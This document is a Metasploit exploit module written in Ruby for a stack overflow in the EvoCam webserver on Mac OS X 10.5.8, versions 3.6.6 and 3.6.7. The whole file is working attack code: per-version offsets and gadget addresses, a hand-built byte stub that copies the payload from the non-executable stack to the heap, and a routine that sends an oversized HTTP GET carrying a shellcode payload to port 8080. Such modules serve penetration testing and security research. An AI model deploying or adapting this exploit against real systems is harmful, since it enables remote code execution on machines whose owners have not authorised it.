MacOS X EvoCam HTTP GET Overflow

`##  
# $Id: evocam_webserver.rb 9460 2010-06-09 18:41:58Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = AverageRanking  
  
include Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MacOS X EvoCam HTTP GET Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the web server provided with the EvoCam  
program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload  
from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,  
3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity.  
},  
'Author' =>  
[  
'Paul Harrington', # Original Exploit Author and MSF Module  
'dookie', # MSF Module Assistance  
],  
'Version' => '$Revision: 9460 $',  
'Platform' => 'osx',  
'License' => MSF_LICENSE,  
'References' =>  
[  
['OSVDB', '65043'],  
['URL', 'http://www.exploit-db.com/exploits/12835'],  
],  
'Payload' =>  
{  
'Space' => 300,  
'BadChars' => "\x00\xff\x09\x0a\x0b\x0c\x0c\x0d\x20",  
'StackAdjustment' => -3500,  
},  
'Privileged' => false,  
'Targets' =>  
[  
[ 'Mac OS X 10.5.8 x86, EvoCam 3.6.6',  
{  
'Arch' => ARCH_X86,  
'Offset' => 1560,  
'Writable' => 0x8fe66448,  
'setjmp' => 0x8fe1cf38,  
'strdup' => 0x8fe210dc,  
'jmp_eax' => 0x8fe01041  
}  
],  
[ 'Mac OS X 10.5.8 x86, EvoCam 3.6.7',  
{  
'Arch' => ARCH_X86,  
'Offset' => 1308,  
'Writable' => 0x8fe66448,  
'setjmp' => 0x8fe1cf38,  
'strdup' => 0x8fe210dc,  
'jmp_eax' => 0x8fe01041  
}  
],  
  
],  
'DisclosureDate' => 'Jun 01 2010',  
'DefaultTarget' => 1))  
  
register_options(  
[  
Opt::RPORT(8080),  
], self.class)  
  
end  
  
def make_exec_payload_from_heap_stub()  
frag0 =  
"\x90" + # nop  
"\x58" + # pop eax  
"\x61" + # popa  
"\xc3" # ret  
  
frag1 =  
"\x90" + # nop  
"\x58" + # pop eax  
"\x89\xe0" + # mov eax, esp  
"\x83\xc0\x0e" + # add eax, byte +0xc  
"\x89\x44\x24\x08" + # mov [esp+0x8], eax  
"\xc3" # ret  
  
setjmp = target['setjmp']  
writable = target['Writable']  
strdup = target['strdup']  
jmp_eax = target['jmp_eax']  
  
exec_payload_from_heap_stub =  
frag0 +  
[setjmp].pack('V') +  
[writable + 32, writable].pack("V2") +  
frag1 +  
"X" * 20 +  
[setjmp].pack('V') +  
[writable + 24, writable, strdup, jmp_eax].pack("V4") +  
"X" * 4  
end  
  
def exploit  
connect  
  
offset = target['Offset']  
  
buffer = "GET "  
buffer << rand_text_alpha_upper(offset)  
buffer << make_exec_payload_from_heap_stub()  
buffer << "\x90\x90"  
buffer << payload.encoded  
buffer << " HTTP/1.0\r\n\r\n"  
  
sock.put(buffer)  
sock.close  
  
handler()  
disconnect  
end  
  
end  
  
`